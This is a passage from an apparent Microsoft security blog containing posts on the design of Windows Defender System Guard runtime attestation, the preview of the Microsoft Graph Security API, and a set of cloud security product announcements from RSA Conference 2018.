Security technologies are targeted by exploits that attempt to run in the same domain of trust. For example, privileged processes are designed to provide a certain degree of isolation (at least in respect to code and data) from regular user-mode processes. The NT kernel determines whether a process is protected based on certain values held in the executive process object. Tampering with these values via a kernel exploit or with a driver (e.g., Mimikatz) can effectively disable process protection. Moving the security decision related to tampering to a separate domain of trust increases complexity for attackers.

Runtime attestation can help in many scenarios, including:

  • Providing supplementary signals for endpoint detection and response (EDR) and antivirus vendors (including full integration with the Windows Defender Advanced Threat Protection stack)
  • Detecting artifacts of kernel tampering, rootkits, and exploits
  • Protected game anti-cheat scenarios (for example, detection of process-protection bypasses that can lead to game-state modification)
  • Sensitive transactions (banking apps, trading platforms)
  • Conditional access (enabling and enhancing device security-based access policies)

With the next update to Windows 10, we are implementing the first phase of Windows Defender System Guard runtime attestation, laying the groundwork for future innovation in this area. This includes developing new OS features to support efforts to move towards a future where violations of security promises are observable and effectively communicated in the event of a full system compromise, such as through a kernel-level exploit.

Attestation and establishing trust

To introduce Windows Defender System Guard runtime attestation on a technical level, its best to begin at the most visible layer: a client API that will eventually be exposed to a relying party. (Note: We share details of the general design as its currently architected; final implementation may differ.)

We are working towards providing an API that relying parties can use to attest to the state of the device at a point in time. The API returns a runtime report that details the claims that Windows Defender System Guard runtime attestation makes about the security posture of the system. These claims include assertions, which are runtime measurements of sensitive system properties.

For the runtime report to have any significant meaning, it must be generated in a fashion that provides reasonable resistance against tampering. This gives rise to the following basic component requirements:

  1. Runtime report generation must be isolated from an attacker
  2. This isolation must be attestable
  3. The runtime report must be cryptographically signed in a manner that is irreproducible outside the isolated environment

Enter VBS enclaves. Were not going to describe these enclaves in-depth here, but its prudent to give some context. On a device with virtual secure mode (VSM) enabled, virtualization extensions of the underlying Instruction Set Architecture (ISA) are employed to logically divide the system into two (theoretically, more) separate worlds: the normal world running the NT kernel that were all familiar with and a separate secure world running a Secure Kernel (SK). We call these two logical levels of separation Virtual Trust Levels (VTLs), in this case NT being VTL-0 and SK being VTL-1.

VBS enclaves enable what can be thought of as a siloed part of a normal world VTL-0 user-mode process. All code and data in this silo live in VTL-1. Transactions in and out of an enclave are done via a well-defined API backed by VSL calls (the mechanism that NT and SK use to communicate). The result of this intricacy is that, as of Windows Fall Creators Update (1709), it is possible to execute code and hold data within an enclave such that the entire VTL-0 normal world both user-mode and kernel-mode cannot directly act upon the siloed code and data while executing and held within the enclave (in VTL-1).

From the VBS enclave, the runtime attestation component can observe and attest to a set of security properties contained in a report. For example, an app could ask Windows Defender System Guard to measure the security of the system from the hardware-backed enclave and return a report. The details in this report can be used by the app to decide whether it performs a sensitive financial transaction or display personal information.

VBS enclaves can also expose an enclave attestation report signed by a VBS-specific signing key. If Windows Defender System Guard can obtain proof that the host system is running with VSM active, it can use this proof together with a signed session report to ensure that the particular enclave is running.

As for the signature of the runtime report itself, an asymmetrical public-private key pair is generated within the enclave. The public key is signed by the Windows Defender System Guard attestation service backend to create a session certificate. In addition, the Windows Defender System Guard attestation service backend produces a signed session report containing details about the machine. These details include boot security properties, including whether the machine booted with Secure boot enabled, to ensure that the core operating system has not been jailbroken or tampered with. Finally, runtime reports are signed locally by the paired private key, which never leaves the enclave. The runtime and session reports can be verified by relying parties with little effort by verifying the report signatures against the session certificate and then ensuring that the certificate is validly signed, rooted in the relevant Microsoft CA.

Establishing the trust necessary to guarantee that the runtime report is authentic, therefore, requires the following:

  • Attesting to the boot state of the machine: the OS, hypervisor, and Secure Kernel (SK) binaries must be signed by Microsoft and configured according to a secure policy
  • Binding trust between the TPM and the health of the hypervisor to allow trust in the Measured Boot Log
  • Extracting the VSM IDKs from the Measured Boot Log and using these to verify the VBS enclave signature
  • Backend verification of the above and signing of the public component of an ephemeral key-pair generated within the enclave with a trusted CA to issue a session certificate
  • Signing of the runtime report with the ephemeral private key

Networking calls between the enclave and the Windows Defender System Guard attestation service are made from VTL-0. However, the design of the attestation protocol ensures that it is resilient against tampering even over untrusted transport mechanisms.

Numerous underlying technologies are required before the chain of trust described above can be sufficiently established. To inform a relying party to the level of trust in the runtime report that they can expect on any particular configuration, a security level is assigned to each Windows Defender System Guard attestation service-signed session report. The security level reflects the underlying technologies enabled on the platform and attributes a level of trust based on the capabilities of the platform. We are mapping the enablement of various security technologies to security levels, and we will share this when the API is published for third-party use. The highest level of trust is likely to require the following features, at the very least:

  • VBS-capable hardware + OEM configuration
  • Dynamic root-of-trust measurements at boot
  • Secure boot to verify hypervisor, NT, SK images
  • Secure policy ensuring:

    • Hypervisor-protected code integrity (HVCI)-enforced kernel mode code integrity (KMCI)
    • Test-signing is disabled
    • Kernel debugging is disabled


Now that we have explained the trusted report component, let us discuss the contents of the runtime report.

The security level exposed in the session report is an important and interesting metric in and of itself. However, Windows Defender System Guard can provide so much more specifically in respect to runtime measurement of system security posture.

We call this runtime measurement component the assertion engine. The idea is to continually measure assert system integrity at runtime, with the security level attesting to security posture at boot.

Some caveats:

  • The assertion engine was designed with the ideal system configuration in mind (i.e., a system configuration with the highest security level)

    • Business needs require Windows Defender System Guard runtime attestation to function on systems even with the lowest security level; Windows Defender System Guard runtime attestation makes no guarantees in this scenario and can act as a signal for other security products on non-locked down editions of Windows

  • When running the ideal configuration, non-ROP kernel-mode code execution is difficult due to hypervisor-protected code integrity (HVCI)-enforced kernel mode code integrity (KMCI); in this scenario:

    • Data corruption attacks are more likely
    • It can be assumed that it’s difficult to tamper with any required kernel-mode agents in non-racing scenarios
    • The runtime assertions are therefore targeted at attacks that can reasonably be performed under the most restrictive attack conditions

  • We are working to limitations of (current) operating system design

    • We have a deep partnership with other teams in Microsoft and we are work in tandem to improve System Guard runtime attestation and core kernel security features. In the current version of the OS, we rely on NT kernel thread management and the Secure Kernel primitives provided to us.

Windows Defender System Guard runtime attestation architecture

High-level overview of Windows Defender System Guard runtime attestation architecture

Architecturally, the solution is collectively referred to as the Windows Defender System Guard runtime monitor and consists of the following client-side components:

  • The VTL-1 assertion engine itself
  • A VTL-0 kernel-mode agent
  • A VTL-0 process we call the broker to host the assertion engine

To rapidly respond to threats, we opted for a dynamic scripting approach that will allow us to frequently release updates going forward. We chose an open-source library that met our requirements for maturity, footprint, and performance. This scripting component forms the core of the assertion engine that executes in VTL-1 (if available).

Running arbitrary logic in this engine wouldnt be very useful if it couldnt interact with the system in any way. For the engine to perform useful work, we provide native helpers in the form of assists. These assists are executed in VTL-0 either by the broker service or by a Kernel-mode agent.

In the next update to Windows, assertion logic is delivered in-band (within the signed engine DLL itself). At some point in the future, these scripts will be delivered out-of-band. This is a core part of the design. It enables us to immediately respond to security events (for example, the discovery of new attack invariants) without the need for delivering a component update via servicing. Apps and services can take advantage of this attestation technology to ensure that the system is free from tampering and that critical processes are running as expected. This hardware-rooted proof-of-health can then be used to identify compromised machines or gate access to critical cloud services. Runtime attestation serves as a platform for a wide variety of advanced security applications.

We believe that we can significantly raise the bar for security on locked-down platforms with modern hardware and appropriate security policies. In a world where direct privileged code-execution is difficult, we think that attacks will increasingly leverage data corruption. Transient changes are also a challenge in the current model. However, future innovations will make achieving persistence harder, making transient malicious changes more difficult. The idea is to continually elevate defense across the entire Windows 10 security stack, thereby pushing attackers into a corner where system changes affecting security posture are detectable. One can think of runtime attestation as being more about detecting minute symptoms that can indicate an attack rather than looking for flashing signals.

We are very excited about this technology because of its potential for making significant leaps in platform security. Theres a lot more about Windows Defender System Guard runtime attestation that we did not cover in this blog, for example, the detailed design itself and where we see this technology going. Stay tuned.



David Kaplan (@depletionmode), Windows Defender ATP Research Team
Adam Zabrocki (@Adam_pi3), Windows Offensive Security Research Team
Rafael Goncalves, Enterprise & Security



Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

Connect to the Intelligent Security Graph using a new API

Most organizations deal with high volumes of security data and have dozens of security solutions in their enterprise, making the task of integrating various products and services daunting and complex. The cost, time, and resources necessary to connect systems, enable correlation of alerts, and provide access to contextual data is extremely high. These challenges hinder the ability for organizations to move quickly when detecting and remediating threats in a world of fast-moving, disruptive attacks.

By connecting security data and systems, we can gain an advantage over todays adversaries. At Microsoft, our security products are powered by the Intelligent Security Graph which synthesizes massive amounts of threat intelligence and security signals from across Microsoft products, services, and partners using advanced analytics to identify and mitigate cyberthreats. This week at the RSA conference, we announced the public preview of a Security API that empowers customers and partners to build on the Intelligent Security Graph. By connecting security solutions and integrating with existing workflows, alerts and contextual information from multiple solutions can be easily consolidated and correlated to inform threat detection, and actions can be taken to streamline incident response. The unified API will make these connections easier by providing a standard interface and uniform schema to integrate and correlate security alerts from multiple sources, enrich investigations with contextual data, and automate security operations for greater efficiency.

The Security API is part of the Microsoft Graph, which is a unified rest API for integrating data and intelligence from Microsoft products and services. Using Microsoft Graph, developers can rapidly build solutions that authenticate once and use a single API call to access or act on security insights from multiple security solutions. Additional value is uncovered when you explore the other Microsoft Graph entities (Office 365, Azure Active Directory, Intune, and more) to tie business context with your security insights.

This public preview supports API access of Alerts from Azure Security Center and Azure Active Directory Identity Protection with Intune and Azure Information Protection coming soon. We are also announcing support for high volume streaming of alerts to a SIEM through Security API integration with Azure Monitor. This will enable seamless ingestion of alerts from multiple sources directly into a SIEM. Over the coming months, well add many more Microsoft and partner security solutions integrations as data providers. We will also add new capabilities that unlock new security context through Security Inventory and take Actions to automation security operations through the same Security API.

Enabling ecosystem partners

The Security API opens up new possibilities for integration partners to build with the Intelligent Security Graph. Partners can not only consume security insights from the Graph but they can allow their alerts, context, and automation to be enabled in the Graph at peer level with integrated Microsoft products. By forming a connected, extended ecosystem of security technologies, Microsoft and partners can deliver better protections for our customers. Some partners have already onboarded to the Security APIs and many other integrations are in progress:


Anomali integrates with the Security API to correlate alerts from Microsoft Graph with threat intelligence, providing earlier detection and response to cyber threats.

The Security Graph API allows us to receive not only actionable alert information but allows security analysts to pivot and enrich alerts with asset and user information. Colby DeRodeff, Co-founder and Chief Strategy Officer of Anomali


Palo Alto Networks can enrich alerts from Microsoft Graph Security with threat intelligence speeding up detection and prevention of cyberattacks for our shared customers.

The adoption of public clouds is accelerating, but so is the threat level to the applications and data inside organizations. Todays announcement of the Microsoft Graph Security API sets the stage for expanding the built-in security features we can offer our joint customers and to help organizations safely embrace the cloud. Andy Horwitz, Vice President, Business and Corporate Development, Palo Alto Networks


PwC uses alerts and context from Microsoft Graph in its Secure Terrain solution to deliver improved visibility and protection.

The integration with Secure Terrain offers users a streamlined way to investigate Microsoft Graph alerts in the context of the broader enterprise and perform threat hunting investigations. Christopher Morris, Principal at PricewaterhouseCoopers

Building intelligent security applications

Customers, managed service providers, and technology partners, can leverage the Security APIs to build and integrate a variety of applications. Some examples include:

  • Custom security dashboards. Surface rich alerts in your custom Security Operations Center dashboards streamline alerts and add contextual information about related entities
  • Security operations tools. Manage alerts in your ticketing, security or IT management system keep alert status and assignments in sync, automate common tasks
  • Threat protection solutions. Correlate alerts and contextual information for improved detections, take action on threats block an IP on firewall or run an AV scan
  • Other applications. Add security functionality to non-security applications HR, financial, and healthcare apps

Get started today:

Join us at the Microsoft booth, N3501 in the north expo hall, at RSA Conference 2018 in San Francisco. Youll get the chance to speak to experts and see how our partners are using the API.

To learn more and get started today with using the Microsoft Graph Security API, check out the following resources:

Categories: Uncategorized Tags:

Tapping the intelligent cloud to make security better and easier

April 16th, 2018 No comments

There has been a distinct shift in my conversations with customers over the last year. Most have gone from asking can we still keep our assets secure as we adopt cloud services?, to declaring, we are adopting cloud services in order to improve our security posture. The driving factor is generally a realization that a cloud services provider can invest more in security, do the job better, and just make life simpler for overburdened enterprise IT and SecOps teams. This idea of making sound security practices easier to implement is a big part of our strategy. Today were announcing several new technologies and programs that build on our unique cloud and intelligence capabilities to make it easier for enterprises to secure their assets from the cloud to the edge.

The first step in protecting people and data from todays dynamic threat landscape is accepting reality. Its time for us as an industry to recognize that the cloud holds so much promise for helping us solve security problems that we should consider the use of cloud-based intelligence a security imperativenot just for workloads deployed in the cloud, but also for improving security of endpoints.

We recently released the 23rd edition of our Security Intelligence Report. The trends it uncovers helps us see why the cloud is becoming a security imperative. Threats are increasingly automated and destructive. No one organization can amass the resources and intelligence to defend against these fast-moving threats. We have to tap into the power of the cloud, and of artificial intelligence, in order to muster the defenses required.

One of the most powerful examples of cloud-based artificial intelligence accelerating Microsofts own security innovation is the Microsoft Intelligent Security Graph. Our Intelligent Security Graph uses advanced analytics to link threat intelligence and security signals from Microsoft and partners and continues to increase in variety and volume of signal. For example, we see the threat landscape through the lens of the 18 billion web pages that Bing scans, the 400 billion emails that are analyzed for spam and malware, and the 5 billion distinct malicious threats that Windows Defender ATP protects our customers against each month.

Artificial intelligence gets better as it is trained with more signal from more diverse sources. Today, we are announcing the preview of a new unified security API in the Microsoft Graph, which allows our technology partners to easily integrate with Microsoft solutions and tap into the power of the Intelligent Security Graph.

The Intelligent Security Graph comes to life through our platform investments, where it connects our security solutions to improve protection, detection, and response. Microsoft invests more than $1 billion in cybersecurity R&D annually, to build new security innovations into Windows, Azure, and Microsoft 365. Today we are announcing new capabilities to help our customers improve their protection against threats and, when attacked, detect and respond more quickly. We are working with partners across the industry to better integrate solutions for our customers.

Improving protection

A fundamental concern for many IT teams is the struggle to know the true security posture of the organization: are all the necessary controls in place? Have all updates been applied? Is everything configured correctly? More importantly, its hard to know what the next steps should be to improve security. Today we are announcing the availability of Microsoft Secure Score, which gives the IT administrator a combined view of security readiness across a broad swath of the digital estatefrom Office 365 services to endpoint devices.

To get around properly configured protection, attackers often focus on deceiving end users with phishing and social engineering techniques. We have made a number of advances in our Office 365 ATP anti-phishing protection recently, and now we are adding Attack Simulator for Office 365 Threat Intelligence in Microsoft 365, so IT teams can train users to guard against phishing.

Information is the beating heart of any company, and the target of most attacks. It’s also a regulatory focus, especially with the new EU GDPR enforcement date rapidly approaching. In February, we announced a set of Microsoft 365 updates to help our customers manage compliance and protect information. As we near the GDPR enforcement date, today we are announcing several new tools and capabilities that help you respond to GDPR obligations with the Microsoft Cloud. Read more about them later today on the Office 365 blog.

Speeding up detection and response

Of course, no protection strategy can be 100% effective. Savvy customers are improving their detection and response capabilities to prepare for the inevitable breach. The Conditional Access capability built into Microsoft 365 has helped many of our customers dramatically improve their protection for tens of millions of employees, by assessing the risk of each request for access to a system, an application, or data, in real time. That risk level informs how much access is granted, according to policy set by IT.

We are extending Conditional Access to factor in post-breach response. New conditions based on continual assessment of endpoint healthnot just a one-time check of configurationenable our customers to restrict or deny access to resources if the device from which the request originates has been compromised by an attack. This new capability is in preview and will be generally available in the next Windows 10 update. Rapid detection and recovery remain out of reach for many of our customers because the specialized skills required to hunt down and eliminate adversaries are in high demand but short supply. To help IT focus its strained resources on the most important issues, we are announcing the general availability of automated remediation as part of Windows Defender ATP in the next Windows 10 update. With this new capability, Windows Defender ATP can automatically apply common remediations, freeing up the experts to work on more difficult recovery tasks.

Our work on detection and response extends to Microsoft Azure as well. As our customers embrace the cloud, Azure Security Center is a key tool that helps them simplify hybrid cloud security and keep pace with ever-evolving threats. Several new capabilities will be available with Security Center this week that help to identify and mitigate vulnerabilities proactively and detect new threats quickly. With the integration of Windows Defender ATP in preview, customers can get all the benefits of advanced threat protection for Windows servers in Azure Security Center.

Working across the industry

Customers who use Microsoft 365 have been taking advantage of increasingly robust tools to protect Office documents and e-mails wherever they go inside and outside the organization. Today we are extending these capabilities to our technology partners with the release of the Azure Information Protection SDK.

The benefits we can all gain from applying cloud intelligence to security problems are tremendous, but can only be fully realized if we work together across the industry. Nearly every customer I speak to has a dozen or more different security solutions in place. Each of those solutions plays a critical role in protecting the organizationand each has valuable contextual information that would help make the others more effective at protecting customers. Today we are announcing the Microsoft Intelligent Security Association, a group of technology providers who have integrated their solutions with Microsoft products to provide customers better protection, detection, and response. Anomali, Check Point, Forcepoint, Palo Alto Networks, and Ziften are among the solution providers working with us. Together, we can bring more signals from more sources to bearwhich helps our customers detect and respond to threats faster.

We also continue to work with a broad coalition of technology partners in the FIDO Alliance to address one of the most fundamental issues in security today: Identity and access management. Our analysis indicates that cloud-based user account attacks are up more than 300% over the past year. Passwords are the weakest link, and they are a source of frustration for users. Today we are announcing an important step in our work to lead the industry toward a future without passwords: support for the FIDO 2.0 standard in the next Windows 10 update. Millions of Windows 10 users already have the ability to sign in to Windows without a password using Windows Hello making authentication stronger and easier. With FIDO 2.0 support, users can take that same password-free authentication experience to any Windows 10 device managed by their organization.

The evolution of the intelligent edge

At Microsoft, we believe the intelligent cloud and intelligent edge will shape the next phase of innovation. The rise of Internet of Things deployments amplifies security challenges, because many devices lack the tools to manage updates or detect and respond to attacks. Building on research done by Microsoft AI and Research, and on decades of Microsoft experience and expertise in silicon, software, and cloud security, today we are announcing the preview of Azure Sphere. Azure Sphere extends our reach to the outer regions of the intelligent edge, enabling us to serve and secure an entirely new category of devices — the billions of MCU powered devices that are built and deployed each year.

Its an exciting time to be working in security. We are joining forces with other security solution providers and using the cloud to our customers advantage. Together, we can turn the tide against attackers. We are at the RSA Conference this week, and looking forward to discussing these new capabilities with you. Visit to learn where you can find us.


Categories: RSA Conference Tags: